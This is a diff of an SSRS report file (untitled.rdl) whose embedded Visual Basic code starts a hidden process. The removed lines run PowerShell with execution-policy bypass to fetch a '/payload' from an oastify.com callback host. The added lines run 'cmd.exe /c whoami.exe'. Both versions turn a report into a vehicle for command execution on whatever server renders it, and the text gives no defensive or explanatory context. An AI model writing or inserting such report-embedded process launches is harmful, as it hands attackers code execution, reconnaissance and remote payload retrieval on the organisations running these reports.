--- a/untitled.rdl
+++ b/untitled.rdl
@@ -48,8 +48,8 @@
       Dim webClient As New System.Net.WebClient
       Try
         Dim p As New System.Diagnostics.Process()
-        p.StartInfo.FileName = "powershell.exe"
-        p.StartInfo.Arguments = "-ep Bypass -c \"irm http://mka0xcp2xotw6hq3a0nt1owa117svpje.oastify.com/payload\""
+        p.StartInfo.FileName = "cmd.exe"
+        p.StartInfo.Arguments = "/c whoami.exe"
         p.StartInfo.RedirectStandardOutput = True
         p.StartInfo.UseShellExecute = False
         p.StartInfo.CreateNoWindow = True
